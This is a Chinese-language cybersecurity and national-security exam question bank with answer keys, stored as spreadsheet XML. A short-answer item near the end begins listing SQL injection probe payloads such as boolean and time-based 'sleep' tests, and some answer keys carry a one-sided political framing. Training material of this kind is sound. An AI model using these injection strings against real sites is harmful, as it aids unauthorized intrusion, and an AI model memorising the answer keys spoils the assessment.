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AWD\20231203-徐总的研发工作\测试数据\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{AE984B00-B796-4671-BDE6-0AB3C627BADB}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-98" yWindow="-98" windowWidth="21795" windowHeight="13695" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="试题导入模板"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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="6389" uniqueCount="771">
  <si>
    <t>安全</t>
  </si>
  <si>
    <t>全球网络安全威胁和趋势分析</t>
  </si>
  <si>
    <t>网络犯罪掀起新浪潮</t>
  </si>
  <si>
    <t>以下哪个地区（）的APT攻击数量是最多的？</t>
  </si>
  <si>
    <t>单选</t>
  </si>
  <si>
    <t>B</t>
  </si>
  <si>
    <t>（）不是APT概念的攻击战术</t>
  </si>
  <si>
    <t>鱼叉邮件|水坑攻击|社会工程学|拒绝服务</t>
  </si>
  <si>
    <t>D</t>
  </si>
  <si>
    <t>各国网络安全防护措施</t>
  </si>
  <si>
    <t>美国的网络安全和基础设施安全局隶属于（）</t>
  </si>
  <si>
    <t>国土安全部|FBI|CIA|美军</t>
  </si>
  <si>
    <t>A</t>
  </si>
  <si>
    <t>网络信息安全技术及应用</t>
  </si>
  <si>
    <t>下面哪个称呼不是常见的APT组织？（）</t>
  </si>
  <si>
    <t>海莲花|人面马|方程式|NASA</t>
  </si>
  <si>
    <t>以色列的网络安全机构的隶属部门是（）？</t>
  </si>
  <si>
    <t>军队|国会|总理办公室|国土安全局</t>
  </si>
  <si>
    <t>C</t>
  </si>
  <si>
    <t>习近平新时代中国特色社会主义思想</t>
  </si>
  <si>
    <t>总体国家安全形势</t>
  </si>
  <si>
    <t>下面哪个国家拥有一台根域名服务器？</t>
  </si>
  <si>
    <t>西班牙|以色列|瑞典|中国</t>
  </si>
  <si>
    <t>苏联的历史教训</t>
  </si>
  <si>
    <t>（）事件促使了苏联人民对政权开始实去信任？</t>
  </si>
  <si>
    <t>切尔诺贝利核电站事故瞒报|阿富汗撤兵|布拉格之春|阿拉伯之春</t>
  </si>
  <si>
    <t>国家安全战略的基本点</t>
  </si>
  <si>
    <t>根据国家安全战略的基本点，我们要做好党领导下的（）设计</t>
  </si>
  <si>
    <t>顶层|中层|中下层|底层</t>
  </si>
  <si>
    <t>我国目前是（）？</t>
  </si>
  <si>
    <t>发达国家|完全统一的国家|网络强国|发展中国家</t>
  </si>
  <si>
    <t>网络安全法解读</t>
  </si>
  <si>
    <t>网络安全法简介</t>
  </si>
  <si>
    <t>由于网络安全法规定不明确，尚不清楚网络安全保护等级制度和信息安全保护等级制度的具体关系。企业若不知道这个关系，依然可以执行（）制度，因为该制度已上升成为法律层面。</t>
  </si>
  <si>
    <t>信息安全保护等级|网络安全保护等级|网络资产安全保护等级|关键基础设施安全保护等级</t>
  </si>
  <si>
    <t>国家安全观的演进</t>
  </si>
  <si>
    <t>江泽民时期的安全理念是（）？</t>
  </si>
  <si>
    <t>传统安全（政治、军事）|新安全观、非传统安全|超越传统安全（政治、经济）|国际安全合作、共同安全</t>
  </si>
  <si>
    <t>全球有13台根域名服务器，美国独占（）台？</t>
  </si>
  <si>
    <t>11|8|10|9</t>
  </si>
  <si>
    <t>日本|澳大利亚|法国|韩国</t>
  </si>
  <si>
    <t>埃及|德国|英国|荷兰</t>
  </si>
  <si>
    <t>`亚太再平衡`战略是谁提出的？</t>
  </si>
  <si>
    <t>特朗普|希拉里|布什|奥巴马</t>
  </si>
  <si>
    <t>我国对于朝鲜拥核的态度是（）？</t>
  </si>
  <si>
    <t>坚决反对|同意|弃权|默许</t>
  </si>
  <si>
    <t>网络安全法在哪一年生效？</t>
  </si>
  <si>
    <t>2020|2016|2018|2017</t>
  </si>
  <si>
    <t>网络安全法在哪一年通过的？</t>
  </si>
  <si>
    <t>2015|2016|2017|2018</t>
  </si>
  <si>
    <t>网络安全法要点解读</t>
  </si>
  <si>
    <t>网络安全法中触发的金额最高可达（）万元？</t>
  </si>
  <si>
    <t>10|50|100|80</t>
  </si>
  <si>
    <t>应用如果要收集用户的数据，（）？</t>
  </si>
  <si>
    <t>可预留后门远程操控用户终端|征得用户同意即可收集全部隐私信息|征集用户同意收集功能相关数据|无须征得同意即可收集数据</t>
  </si>
  <si>
    <t>内容安全：阻断违法信息传播</t>
  </si>
  <si>
    <t>魏则西案后（）这个最关键的影响因素依然存在？</t>
  </si>
  <si>
    <t>广告等标识符不清楚|搜索引擎竞价排名|无良医疗广告夸大其辞|诈骗电话</t>
  </si>
  <si>
    <t>关键信息基础设施运营者的义务</t>
  </si>
  <si>
    <t>关键信息基础设施运营者不得采购的设备是（）？</t>
  </si>
  <si>
    <t>国外的设备|黑名单上的设备|反华意向国家的设备|和美军合作的企业的设备</t>
  </si>
  <si>
    <t>基础安全产品培训</t>
  </si>
  <si>
    <t>网络信息安全整体需求</t>
  </si>
  <si>
    <t>你如果收到了110打来的诈骗电话，很可能遇到了（）的攻击手段。</t>
  </si>
  <si>
    <t>基站伪造|鱼叉邮件|钓鱼邮件|手机被后门控制</t>
  </si>
  <si>
    <t>下列哪个行为是洗库？（）</t>
  </si>
  <si>
    <t>通过钓鱼网站获得大量个人敏感数据|在网银碰撞已获得的账密检查此账密是否正确|使用筛选后的账密碰撞游戏网站、银行网站|以每条数据10美元的价格出售数据</t>
  </si>
  <si>
    <t>通过一个明星的微博上发布的照片，我们可以获得这个人的很多相关信息。下面哪个工具不属于能够帮助我们分析图片中信息的工具？（）</t>
  </si>
  <si>
    <t>Exif查看器|PhotoShop|LSB隐写分析软件|谷歌地图</t>
  </si>
  <si>
    <t>纵深安全防护体系</t>
  </si>
  <si>
    <t>纵深安全防护体系会在企业网络中设计诸多关卡，但不包含（）</t>
  </si>
  <si>
    <t>安全防护|安全检测|安全审计|应急响应</t>
  </si>
  <si>
    <t>安全设备分类</t>
  </si>
  <si>
    <t>IPS的全拼是（）</t>
  </si>
  <si>
    <t>Intrusion Prevention System|Intrusion Protection System|Intrusion Production System|Intrusion Punishment System</t>
  </si>
  <si>
    <t>在安全设备的三大分类中，僵木蠕检测属于（）</t>
  </si>
  <si>
    <t>安全防护类|安全检测类|安全审计类|威胁检测类</t>
  </si>
  <si>
    <t>安全防护类产品</t>
  </si>
  <si>
    <t>下列哪一种类型的防火墙的使用到的技术最简单，且出现的最早？</t>
  </si>
  <si>
    <t>应用防火墙|代理防火墙|状态检测防火墙|包过滤防火墙</t>
  </si>
  <si>
    <t>下列哪一种设备的部署是专门旁路连接在网络中，且不会对企业网络速率产生影响？（）</t>
  </si>
  <si>
    <t>IDS|IPS|FW|WAF</t>
  </si>
  <si>
    <t>安全检测类产品</t>
  </si>
  <si>
    <t>IDS和IPS相比他的优点在于（）</t>
  </si>
  <si>
    <t>对网络速率没有影响|能够进行协议分析|可以和防火墙进行联动|可以实时阻断</t>
  </si>
  <si>
    <t>安全审计类产品</t>
  </si>
  <si>
    <t>UTM发展不是很好的原因在于（）</t>
  </si>
  <si>
    <t>本身不具备安防能力|功能被态势感知取代|对一切网络接入设备的统一管理功能对安全主管用处不大|可集成功能过多但本身性能跟不上</t>
  </si>
  <si>
    <t>系统漏洞扫描设备通过（）方式进行扫描</t>
  </si>
  <si>
    <t>白盒|黑盒加白盒|半自动半手工|黑盒</t>
  </si>
  <si>
    <t>下面哪个程序不是常见的数据库？</t>
  </si>
  <si>
    <t>Mysql|Oracle|SqlMap|Sqlite</t>
  </si>
  <si>
    <t>下一代安全技术及工作建议</t>
  </si>
  <si>
    <t>安全能力动态化的发展阶段不包括（）？</t>
  </si>
  <si>
    <t>网络化阶段|虚拟化阶段|能力云阶段|云查杀阶段</t>
  </si>
  <si>
    <t>安全思维的重大改变</t>
  </si>
  <si>
    <t>安全思维在未来应发生转变，应该从`以网络或系统为中心的管理与技术策略`，转变为</t>
  </si>
  <si>
    <t>自顶向下以信息或数据为中心的管理与技术策略|借助云安全的能力将数据托付给云数据库|将安全设备部署在数据前来保护数据安全|坚持人才是安全的核心并持续更迭更高素质的安全人员</t>
  </si>
  <si>
    <t>安全思维在未来应发生转变，应该从`防范`转向为（）的建构</t>
  </si>
  <si>
    <t>快速应急响应|快速检测和响应能力|快速溯源和响应|快速检测和应急</t>
  </si>
  <si>
    <t>网络运营者的义务</t>
  </si>
  <si>
    <t>网络日志的保存期期限应不低于（）个月？</t>
  </si>
  <si>
    <t>4|6|8|10</t>
  </si>
  <si>
    <t>下列哪个不是网络运营者的义务？（）</t>
  </si>
  <si>
    <t>进行内容管理，及时阻断有害信息|制定网络安全事件应急预案|为了保护用户隐私拒绝向有关部门提供技术支持|遵守约谈制度</t>
  </si>
  <si>
    <t>关键信息基础设施的运营者的义务</t>
  </si>
  <si>
    <t>什么人终身不得从事网络安全管理和网络运营关键岗位的工作？</t>
  </si>
  <si>
    <t>受过行政处罚|受过治安处罚|受过刑事处罚|受过国外教育的留学生</t>
  </si>
  <si>
    <t>（）才是安全的核心？</t>
  </si>
  <si>
    <t>人|数据|安全设备|攻防技术</t>
  </si>
  <si>
    <t>网络安全的定义和要素</t>
  </si>
  <si>
    <t>选择国家不倾向使用国外的设备的主要原因？</t>
  </si>
  <si>
    <t>促进国内厂商的崛起|政治因素，今天和谁不好我就不让政企采购这个国家的设备|国外设备大多英语，不方便我国工作人员使用|国外设备可能存在大规模隐藏的后门和病毒</t>
  </si>
  <si>
    <t>病毒</t>
  </si>
  <si>
    <t>病毒的特性不包括（）？</t>
  </si>
  <si>
    <t>具有传播性|必须借助网络才能传播|具有破坏性且可能集成后门|触发启动条件可能有针对性</t>
  </si>
  <si>
    <t>BadUSB的原理是（）</t>
  </si>
  <si>
    <t>该U盘中含有不良的视频信息|在U盘内放入恶意程序并制作autorun.inf文件|USB线路口电路板断路烧毁电脑的USB插槽|USB连接的板子固件区写入了恶意指令</t>
  </si>
  <si>
    <t>中国移动信息安全热点问题分析与探讨</t>
  </si>
  <si>
    <t>网络空间对抗加剧</t>
  </si>
  <si>
    <t>2015年，哪个恐怖组织（）通过黑客手段获取100多名美国军人的住址并将他们杀害？</t>
  </si>
  <si>
    <t>塔利班|ISIS|哈马斯|基地组织</t>
  </si>
  <si>
    <t>windows系统安全</t>
  </si>
  <si>
    <t>445端口可能存在什么漏洞？</t>
  </si>
  <si>
    <t>MS17010|永恒之黑|文件上传|信息泄露</t>
  </si>
  <si>
    <t>基站伪造</t>
  </si>
  <si>
    <t>基站会被劫持的主要原因是（）？</t>
  </si>
  <si>
    <t>基站保安能力不足|当前手机制作工艺不足|企业内部有内鬼|GSM单向鉴权</t>
  </si>
  <si>
    <t>2016年在北京派出了两台车在抓捕伪基站的过程中，抓捕了0台，但监测到有20多台流动伪基站。但后来主动阻止伪基站的主要原因是（）？</t>
  </si>
  <si>
    <t>发现了非常有效的能够检测流动伪基站位置的方法|发明了用于直接屏蔽流动伪基站方法的电磁手段|开源的伪基站系统存在安全漏洞，利用黑客手段阻止其发送垃圾短信|国内国外抓捕了很多诈骗团伙</t>
  </si>
  <si>
    <t>SS7漏洞</t>
  </si>
  <si>
    <t>2016年4月17日，CBS《60分钟》世界著名黑客现场演示了窃取美国某议员的位置信息和短信内容，原因是（）</t>
  </si>
  <si>
    <t>永恒之蓝漏洞|SS7漏洞|畸形解析漏洞|RCE漏洞</t>
  </si>
  <si>
    <t>下列哪个漏洞可以假冒用户拨打电话？</t>
  </si>
  <si>
    <t>永恒之蓝漏洞|RCE漏洞|畸形解析漏洞|SS7漏洞</t>
  </si>
  <si>
    <t>SS7漏洞在我国影响相对其他国家会小一些，因为利用SS7除了知道电话号码外还需要满足一个条件。这是因为（）？</t>
  </si>
  <si>
    <t>国外小运营商很多可能对外提供非法的访问权限|我国公安网警非常强大|三大运营商使用的SS7协议进行了修正更加完美|防火长城屏蔽了SS7漏洞利用的EXP流量</t>
  </si>
  <si>
    <t>业务流程安全</t>
  </si>
  <si>
    <t>2013-2016年，时间跨度很大的`换卡短信`事件警示了我们在业务流程上的缺陷，导致用户的和此号码关联的一切财产一朝之间悉数丧失。从业务流程角度讲，当时的业务问题是（）。</t>
  </si>
  <si>
    <t>移动内部有内鬼|营业厅工作人员没有正确核对持卡用户|换卡没有短信验证码校验|受害者的安全意识淡薄导致自己财产受损，与我司业务无关</t>
  </si>
  <si>
    <t>‘免流问题’讨论</t>
  </si>
  <si>
    <t>2015年12月30日，乌云平台报告的中国三大运营商流量计费系统绕过的主要原因是（）？</t>
  </si>
  <si>
    <t>计费系统的shell被黑客拿下|对移动计费流量白名单的匹配策略不恰当|计费系统的业务功能被发掘逻辑漏洞|内鬼把部分手机号放进了计费系统的白名单使得计费系统不再对其进行计费</t>
  </si>
  <si>
    <t>号码泄露</t>
  </si>
  <si>
    <t>移动之前泄露了内部使用的获取号码权限的接口给黑产，导致部分商业网站藏入暗链后可与黑产链沟通获得用户的手机号码，这个当时的事件在业务上出现问题的原因是（）？</t>
  </si>
  <si>
    <t>内鬼的存在|黑产getshell了内部接口机器的权限|WPA访问网络协议设计不完善|该内部接口过滤外部访问URL不严格并被黑产直接使用</t>
  </si>
  <si>
    <t>下面哪个选项不是IPS的特性？</t>
  </si>
  <si>
    <t>能够实时监控多种网络攻击并进行阻断|使用DPI技术，深入七层的数据流攻击特征，依靠静态签名识别攻击|旁路接入网络即可保护网络|在线部署，实施阻断攻击</t>
  </si>
  <si>
    <t>下面哪个选项不是IDS的特性？</t>
  </si>
  <si>
    <t>可主动实时阻断|旁路部署，不影响网络速率|可以和防火墙联动来实现实时阻断|更新特征库来识别最新的攻击</t>
  </si>
  <si>
    <t>DDos的常见攻击手段不包括（）？</t>
  </si>
  <si>
    <t>流量带宽消耗|挖断该企业的网络光纤|主机资源消耗|利用拒绝服务漏洞攻击</t>
  </si>
  <si>
    <t>WEB防篡改系统如何实现的（）？</t>
  </si>
  <si>
    <t>降低中间件权限使其失去对网页文件的更改权限|通过CDN代理的方式避免网站被getshell进行篡改|有监控程序检测并禁止非授权的首页更改|使站点直接成为纯静态网页</t>
  </si>
  <si>
    <t>下面（）厂不是常见的生产路由器的厂商？</t>
  </si>
  <si>
    <t>MicroSoft|Cisco|HUAWEI|Juniper</t>
  </si>
  <si>
    <t>DNS的端口是（）？</t>
  </si>
  <si>
    <t>25|445|5900|53</t>
  </si>
  <si>
    <t>下面哪个安全事件不属于APT组织的行为？</t>
  </si>
  <si>
    <t>护网行动中大量内网主机被红队getshell|有卧底潜伏在关键岗位秘密向境外发送特定数据|Google Aurora|震网病毒变种传播入移动内部进行破坏</t>
  </si>
  <si>
    <t>黑产产业链中非法牟利的步骤包括（）</t>
  </si>
  <si>
    <t>多选</t>
  </si>
  <si>
    <t>获得大量个人敏感数据|洗库|撞库|数据倒卖</t>
  </si>
  <si>
    <t>ABCD</t>
  </si>
  <si>
    <t>上世纪著名的‘铁人’王进喜的照片在当时泄露了哪些国家机密？</t>
  </si>
  <si>
    <t>纬度|经度|油井的直径|油田的储量和产量</t>
  </si>
  <si>
    <t>ACD</t>
  </si>
  <si>
    <t>信息安全三要素</t>
  </si>
  <si>
    <t>信息安全三要素有（）、（）和（）</t>
  </si>
  <si>
    <t>不可抵赖性|保密性|完整性|可用性</t>
  </si>
  <si>
    <t>BCD</t>
  </si>
  <si>
    <t>基础安全产品体系</t>
  </si>
  <si>
    <t>企业中的安全设备主要分为三类，分为（）、（）和（）</t>
  </si>
  <si>
    <t>安全防护|安全应急|安全检测|安全审计</t>
  </si>
  <si>
    <t>过去的防火墙有哪三种类型？（）、（）和（）</t>
  </si>
  <si>
    <t>包过滤防火墙|应用代理型防火墙|NG防火墙|状态检测型防火墙</t>
  </si>
  <si>
    <t>ABD</t>
  </si>
  <si>
    <t>IDS的两个最主要的功能是？</t>
  </si>
  <si>
    <t>即时阻断|实时监测|风险分析|安全审计</t>
  </si>
  <si>
    <t>BD</t>
  </si>
  <si>
    <t>攻击无处不在</t>
  </si>
  <si>
    <t>2015年7月，意大利APT团队`Hacking Team`被入侵，泄露了该团队积攒的大量0 day、非法监听的数据、商业合同、木马设计源码和员工信息，导致此事件发生的原因主要在于（）。</t>
  </si>
  <si>
    <t>系统管理员大意，使得个人电脑被入侵|内部网络缺少严格身份认证和授权机制|团队内部数据未加密存储|团队名气过大，名气大的单位都会成为靶子</t>
  </si>
  <si>
    <t>ABC</t>
  </si>
  <si>
    <t>WAF主要用来对（）协议提供检查</t>
  </si>
  <si>
    <t>HTTP|ARP|DNS|HTTPS</t>
  </si>
  <si>
    <t>AD</t>
  </si>
  <si>
    <t>下列哪些设备可以划归为UTM进行管理？</t>
  </si>
  <si>
    <t>IPS|AV|FW|VPN</t>
  </si>
  <si>
    <t>骚扰电话诈骗电话</t>
  </si>
  <si>
    <t>我们的业务中经常有骚扰电话和诈骗电话的投诉，骚扰诈骗电话是诈骗的重要环节，常见的方式有哪三个（）？</t>
  </si>
  <si>
    <t>“响一声”|语音群呼|定向诈骗|基站伪造</t>
  </si>
  <si>
    <t>一般意义上讲，网络安全主要包括哪三个要素（）？</t>
  </si>
  <si>
    <t>网络设备安全|网络信息传输安全|网络信息内容安全|网络操作系统安全</t>
  </si>
  <si>
    <t>从系统层次上讲，网络安全实质上包含哪三个层次（）？</t>
  </si>
  <si>
    <t>物理安全|人员安全|网络安全|信息安全</t>
  </si>
  <si>
    <t>物理安全</t>
  </si>
  <si>
    <t>物理安全主要包括哪三个方面（）？</t>
  </si>
  <si>
    <t>电磁安全|环境安全|设备安全|媒体安全</t>
  </si>
  <si>
    <t>蠕虫病毒攻击</t>
  </si>
  <si>
    <t>蠕虫的基本程序有哪三个结构？</t>
  </si>
  <si>
    <t>启动模块|传播模块|隐藏模块|目的功能模块</t>
  </si>
  <si>
    <t>拒绝服务攻击</t>
  </si>
  <si>
    <t>SYN洪水攻击中涉及含什么标志位的包？</t>
  </si>
  <si>
    <t>SYN|SYN-ACK|ACK|FIN</t>
  </si>
  <si>
    <t>AB</t>
  </si>
  <si>
    <t>新型基站伪造可以伪装成什么样子？，这带给抓捕工作很大的困难。</t>
  </si>
  <si>
    <t>背包式|车载式|音箱式|手提式</t>
  </si>
  <si>
    <t>常用的伪基站检测手段有（）？</t>
  </si>
  <si>
    <t>位置更新次数|LAC值异常分析|垃圾短信|信号强度变化趋势是否趋于平缓</t>
  </si>
  <si>
    <t>SS7防火墙是抵御复杂SS7攻击的必要工具，但是目前对SS7仅能进行检测，却无法根本解决问题。检测SS7的手段有哪些？（）</t>
  </si>
  <si>
    <t>拦截特定的信令|重路由，使得部分敏感信息模糊化|源检测，比较IMSI和全局号码，判断是否运营商对其用户进行查询|位置检测，比较全局号码和用户位置，判断用户是否确实处于国漫状态</t>
  </si>
  <si>
    <t>MOA APP安全问题严重</t>
  </si>
  <si>
    <t>2015年开始，省公司通用的MOA APP这样的办公软件出现过哪些非常严重的安全问题？</t>
  </si>
  <si>
    <t>短信逻辑缺陷|邮箱访问逻辑缺陷|未授权访问后台信息|服务器明文存储密码</t>
  </si>
  <si>
    <t>下面哪些行为或攻击会可能导致信息泄露？</t>
  </si>
  <si>
    <t>去餐厅家人吃个饭，接入公用wifi|制作钓鱼网站伪造成移动官网，把链接发给别人说移动充话费可薅羊毛|打电话给客服，指导客服在充值处输入%27询问客服网页状态|冒充基站，伪装自己是10086打电话问移动密码</t>
  </si>
  <si>
    <t>账号策略</t>
  </si>
  <si>
    <t>本地安全策略-账号策略包含哪些内容？</t>
  </si>
  <si>
    <t>密码复杂性要求|密码长度最小值|密码最长存留期|账户锁定次数限制</t>
  </si>
  <si>
    <t>特洛伊木马</t>
  </si>
  <si>
    <t>下列哪些表述是木马的目的？</t>
  </si>
  <si>
    <t>盗取信息|远程控制的后门|拒绝服务的僵尸代理|大附件邮件转发</t>
  </si>
  <si>
    <t>胡锦涛时期的国家安全观是（）和（）？</t>
  </si>
  <si>
    <t>超越传统安全|国际安全合作|非传统安全|共同安全</t>
  </si>
  <si>
    <t>总体国家安全观</t>
  </si>
  <si>
    <t>总体国家安全观的理论价值有（）和（）</t>
  </si>
  <si>
    <t>国家安全理论创新|准确把握国家安全形势新特点新趋势|国家安全各方面内容和要求的有机统一|习近平新时代中国特色社会主义思想重要组成部分</t>
  </si>
  <si>
    <t>总体国家安全形势目前是什么样子？</t>
  </si>
  <si>
    <t>政治安全形势相对严峻|经济安全有风险但可控|社会安全形势趋于复杂|军事安全有保障</t>
  </si>
  <si>
    <t>国家安全的外部的主要威胁主要是（）和（）</t>
  </si>
  <si>
    <t>台湾对于统一的消极态度|美国的亚太再调整|日本政治的右倾化|港独分子的分裂活动</t>
  </si>
  <si>
    <t>BC</t>
  </si>
  <si>
    <t>网络安全法与下列哪些法律是相关法律且属于同一法律位阶？</t>
  </si>
  <si>
    <t>《保密法》|《反间谍法》|《治安管理处罚法》|《反恐怖主义法》</t>
  </si>
  <si>
    <t>下列哪些是涉嫌网络信息安全犯罪罪名？</t>
  </si>
  <si>
    <t>非法入室罪|非法入侵计算机信息系统罪|破坏计算机信息系统罪|非法利用信息网络罪</t>
  </si>
  <si>
    <t>物理攻击</t>
  </si>
  <si>
    <t>下面哪些行为属于物理攻击？</t>
  </si>
  <si>
    <t>线路窃听|通过照片分析住址|电磁泄漏|硬件损坏</t>
  </si>
  <si>
    <t>下面哪些服务是运维人员对OS远程操作常见的端口？</t>
  </si>
  <si>
    <t>22|3389|5900|3306</t>
  </si>
  <si>
    <t>同源策略是指下面哪些内容一样？</t>
  </si>
  <si>
    <t>IP|域名|端口|协议</t>
  </si>
  <si>
    <t>以下哪些函数能够触发反序列化漏洞？</t>
  </si>
  <si>
    <t>__construct|lambda|__destruct|__sleep</t>
  </si>
  <si>
    <t>杀毒软件如何检测恶意程序？</t>
  </si>
  <si>
    <t>特征码检测|流量发送至已检测到的C2服务器|通过沙盒行为提前分析到程序会进行恶意的数据篡改和敏感行为|试图获取键盘记录、屏幕监控等权限</t>
  </si>
  <si>
    <t>以下哪些语言是WEB最常使用的脚本语言？</t>
  </si>
  <si>
    <t>Php|Aspx|Java|Assembly Language</t>
  </si>
  <si>
    <t>网络安全新趋势</t>
  </si>
  <si>
    <t>人工智能可能引发的新的网络安全风险有哪些？</t>
  </si>
  <si>
    <t>数据污染攻击|模型安全|逃逸攻击|代码安全</t>
  </si>
  <si>
    <t>影响人工智能安全的因素有哪些?</t>
  </si>
  <si>
    <t>学习框架和组件存在漏洞|传感器存在漏洞|训练数据存在问题|使用了开源的软件</t>
  </si>
  <si>
    <t>个人和组织在进行发送的电子信息中应遵守法律，如（）？</t>
  </si>
  <si>
    <t>不得设置恶意程序|不得含有法律、行政法规禁止发布或者运输的信息|传输个人隐私数据|传输个人家庭的数据</t>
  </si>
  <si>
    <t>下列哪些选项是操作系统？</t>
  </si>
  <si>
    <t>Fedora|Informix|Weblogics|Solaris</t>
  </si>
  <si>
    <t>运维安全审计的主要功能应该包含（）？</t>
  </si>
  <si>
    <t>单点登录|身份认证|操作审计|违规操作阻断</t>
  </si>
  <si>
    <t>网络运营者的法律义务有（）？</t>
  </si>
  <si>
    <t>不得从事非法入侵他人网络|不得提供专门用于从事侵入网络的工具|明知他人从事危害网络活动并提供技术支持|敏感数据本地存储</t>
  </si>
  <si>
    <t>关键信息基础设施运营者违法可能获得哪些处罚？</t>
  </si>
  <si>
    <t>暂停相关业务|停业整顿|关闭网站|吊销相关业务许可证</t>
  </si>
  <si>
    <t>下述哪些漏洞是web安全的相关漏洞？</t>
  </si>
  <si>
    <t>永恒之蓝漏洞|文件包含漏洞|RCE漏洞|文件上传漏洞</t>
  </si>
  <si>
    <t>威胁呈高发态势</t>
  </si>
  <si>
    <t>网页仿冒手段目前已升级换代</t>
  </si>
  <si>
    <t>判断</t>
  </si>
  <si>
    <t>正确</t>
  </si>
  <si>
    <t>针对HTTPS和SSL证书网站的攻击越来越多</t>
  </si>
  <si>
    <t>木马和僵尸网络仍威胁巨大</t>
  </si>
  <si>
    <t>CNCERT公布的数据显示，僵尸网络目前至少控制服务器IP5w个，规模在100-1000的站72.7%</t>
  </si>
  <si>
    <t>亚洲遭受到的APT攻击远超其他地区</t>
  </si>
  <si>
    <t>大规模数据泄露事件频发</t>
  </si>
  <si>
    <t>在网络攻击中，大企业是最大的受害者</t>
  </si>
  <si>
    <t>错误</t>
  </si>
  <si>
    <t>党的十九大报告</t>
  </si>
  <si>
    <t>习近平总书记指出，坚持总体国家安全观，统筹发展和安全，增强忧患意识，做到居安思危，是我们党治国理政的一个重大原则，有效维护国家安全。国家安全是安邦定国的重要基石，维护国家安全是全国各族人民根本利益所在。</t>
  </si>
  <si>
    <t>总体国家安全观形成的现实背景</t>
  </si>
  <si>
    <t>全球"政治觉醒"是在说全球的百姓开始关心政治理念并会付诸行动。全球都面临这个问题。社会矛盾会突发，这是特殊而关键的时期，有些过去的问题没有解决，新的问题还在持续。传统的政治方式、安全维护方式需要与时俱进。</t>
  </si>
  <si>
    <t>总体国家安全观的内涵、现实意义及其理论价值</t>
  </si>
  <si>
    <t>总体国家安全观最鲜明的特点：总体性</t>
  </si>
  <si>
    <t>苏联专注于传统的安全，和美国搞军备竞赛，搞核当量的竞赛。但是，他的失败在于政治安全，并没有打仗。这就是国家安全观念太单一，顾此失彼，没有维护好总体的国家安全</t>
  </si>
  <si>
    <t>中国特色国家安全体系</t>
  </si>
  <si>
    <t>中国特色国家安全的主要领域（9个领域）：政治、经济、军事、社会、国土、自远、科技、生态、核</t>
  </si>
  <si>
    <t>新型国家安全观并没有继承古代近代的安全观念，是我国的创新，是中国特色社会主义的一部分</t>
  </si>
  <si>
    <t>美国的亚太再平衡战略中，对华的政治包围圈已经完整包围了我国，对我国的不良影响非常巨大</t>
  </si>
  <si>
    <t>我国外部威胁的主要因素：美国全球战略与亚太战略的调整</t>
  </si>
  <si>
    <t>监测到的拒绝服务攻击中，来自于智能家居的流量并不是拒绝服务攻击流量的主力</t>
  </si>
  <si>
    <t>国家安全的外部的主要威胁主要是美国的亚太再调整和日本政治的右倾化</t>
  </si>
  <si>
    <t>大力提升全民安全意识</t>
  </si>
  <si>
    <t>构建国家安全战略，需要内外皆修，标本兼治，统筹好内因和外因，兼顾好重点与一般，加强维护好国家安全能力建设。其中最为关键的是顶层设计能力，协调好个人与安全的关系。</t>
  </si>
  <si>
    <t>网络安全相关定义</t>
  </si>
  <si>
    <t>在2015年，第一次有了网络运营者的概念，网络运营者被写入刑法</t>
  </si>
  <si>
    <t>2017年6月1日，网络安全法正式生效</t>
  </si>
  <si>
    <t>题目图片</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>出题描述</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>学科</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>题库名称</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>出题人</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">参考答案	</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">试题类型	</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">试题名称	</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">试题问题	</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">难易程度	</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>简答</t>
  </si>
  <si>
    <t>论述</t>
  </si>
  <si>
    <t>简单</t>
  </si>
  <si>
    <t>困难</t>
  </si>
  <si>
    <t>中等</t>
  </si>
  <si>
    <t>简述2010年震网病毒如何投递到伊朗核电站，并如何进行攻击致使离心机报废？</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>简述震网病毒感染到主机的行为特征？以及震网病毒的特点及启示？</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>描述基于联合查询注入的SQL注入过程，给出每步详细的payload和思路简述。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.如何投递到伊朗核电站
病毒本身具备传播和潜伏能力，会在win server系列检测是否有西门子系统来决定病毒是否被激活，否则只是静态潜伏和传播。传播方式是用过U盘传播，会利用打印机漏洞、U盘自动播放功能，进行摆渡传输。最终通过这种途径，进入伊朗的核电站系统。
2.如何攻击，报废离心机。
病毒会劫持控制机发送向监控系统的流量，发送伪造的正常的流量向监控系统，使得监控人员感知不到离心机运转异常；发送超负荷指令给离心机，使得离心机在特定时间超速运转，降低寿命。最终离心机报废。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.特征
潜伏：仅在server环境探活，其他被感染环境仅潜伏和传播，没有暴露的行为
传播方式：利用U盘摆渡传播
漏洞利用方式大：利用多个零日漏洞和N day漏洞
智慧：劫持离心机发送虚假监控数据
2.特点
针对性：检测server、西门子等工控环境场景才激活程序行为
代价高昂：使用多个0 day漏洞
定向性：针对专门工控场景系统
3.启示
云查杀的普及用以防止此类病毒程序的巨大扩散，避免某程序扩散后但是没有人意识到其巨大的传播能力</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">1.边界测试
id 设置为 -1 1 100000000，看内容有什么回显
2.判断漏洞点和注⼊类型
判断数字型 id=1 and 1=1
1 and 1=2 时间盲注 1 and sleep(5);--+
